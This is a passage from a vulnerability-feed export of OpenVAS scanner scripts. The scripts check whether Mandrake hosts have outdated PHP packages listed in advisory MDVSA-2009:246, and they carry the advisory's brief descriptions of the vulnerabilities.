isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != 
NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", 
rpm:\"php-xsl~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.", "modified": "2018-04-06T00:00:00", "published": "2009-09-28T00:00:00", "id": "OPENVAS:136141256231064958", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064958", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:246 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_246.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:246 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in php:\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key with\nthe NULL byte. NOTE: this might only be a vulnerability in limited\ncircumstances in which the attacker can modify or add database entries\nbut does not have permissions to truncate the file (CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact\nand attack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in\nPHP before 5.2.11 has unknown impact and attack vectors related to\nan incorrect sanity check for the color index. (CVE-2009-3293)\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:246\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64958\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-28 19:09:13 +0200 (Mon, 28 Sep 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:246 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba_bundle\", rpm:\"php-dba_bundle~4.3.4~1.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php_common432\", rpm:\"lib64php_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp4_common4\", rpm:\"libphp4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cgi\", rpm:\"php4-cgi~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cli\", rpm:\"php4-cli~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-dba_bundle\", rpm:\"php4-dba_bundle~4.4.4~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-devel\", rpm:\"php4-devel~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-exif\", rpm:\"php4-exif~4.4.4~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.1.6~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php4_common4\", rpm:\"lib64php4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.", "modified": "2017-07-07T00:00:00", "published": "2009-09-28T00:00:00", "id": "OPENVAS:64958", "href": "http://plugins.openvas.org/nasl.php?oid=64958", "type": "openvas", "title": "Mandrake Security Advisory 
MDVSA-2009:246 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_246.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:246 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in php:\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key with\nthe NULL byte. 
NOTE: this might only be a vulnerability in limited\ncircumstances in which the attacker can modify or add database entries\nbut does not have permissions to truncate the file (CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact\nand attack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in\nPHP before 5.2.11 has unknown impact and attack vectors related to\nan incorrect sanity check for the color index. (CVE-2009-3293)\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:246\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.\";\n\n \n\nif(description)\n{\n script_id(64958);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-28 19:09:13 +0200 (Mon, 28 Sep 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:246 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba_bundle\", rpm:\"php-dba_bundle~4.3.4~1.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php_common432\", rpm:\"lib64php_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp4_common4\", rpm:\"libphp4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cgi\", rpm:\"php4-cgi~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php4-cli\", rpm:\"php4-cli~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-dba_bundle\", rpm:\"php4-dba_bundle~4.4.4~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-devel\", rpm:\"php4-devel~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-exif\", rpm:\"php4-exif~4.4.4~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.1.6~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php4_common4\", rpm:\"lib64php4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += 
